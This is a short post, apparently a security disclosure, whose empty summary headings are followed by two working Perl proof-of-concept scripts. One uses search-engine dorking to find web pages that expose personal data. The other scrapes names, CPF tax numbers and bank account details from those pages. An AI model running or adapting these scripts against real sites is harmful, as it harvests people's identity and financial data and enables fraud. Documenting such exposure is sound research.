Heitor Gouvêa
Un pequeño caso de scraping de datos personales expuestos en la web
Resumen
Descricion
Prueba de Concepto
#!/usr/bin/env perl
use 5.030;
use strict;
use warnings;
use WWW::Mechanize;
use Mojo::Util qw(url_escape);
sub main {
my $dork = $ARGV[0];
if ($dork) {
$dork = url_escape($dork);
my %seen = ();
my $mech = WWW::Mechanize -> new();
$mech -> ssl_opts (verify_hostname => 0);
for my $page (0 .. 10) {
my $url = "https://wwww.bing.com/search?q=${dork}&first=${page}0";
$mech -> get($url);
my @links = $mech -> links();
foreach my $link (@links) {
$url = $link -> url();
next if $seen{$url}++;
if ($url =~ m/^https?/ && $url !~ m/bing|live|microsoft|msn/) {
print $url, "\n";
}
}
}
}
}
exit main();
#!/usr/bin/env perl
use 5.030;
use strict;
use warnings;
use Mojo::DOM;
use Mojo::UserAgent;
binmode(STDOUT, ":encoding(UTF-8)");
sub main {
my $urls_file = $ARGV[0];
if ($urls_file) {
my $userAgent = Mojo::UserAgent -> new (
agent => "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko)"
);
open my $urls_filehandle, "<", $urls_file or die $!;
while (<$urls_filehandle>) {
chomp ($_);
my $request = $userAgent -> get($_) -> result();
if ($request -> is_success()) {
my $account = $request -> dom -> find("tr td") -> map("text") -> join(",");
$account =~ s/Nome,//
&& $account =~ s/CPF,//
&& $account =~ s/Banco,//
&& $account =~ s/Tipo da conta,//
&& $account =~ s/Agência,//
&& $account =~ s/Conta,//
&& $account =~ s/Agência Métodos,//;
say $account;
}
}
close ($urls_filehandle);
}
}
exit main();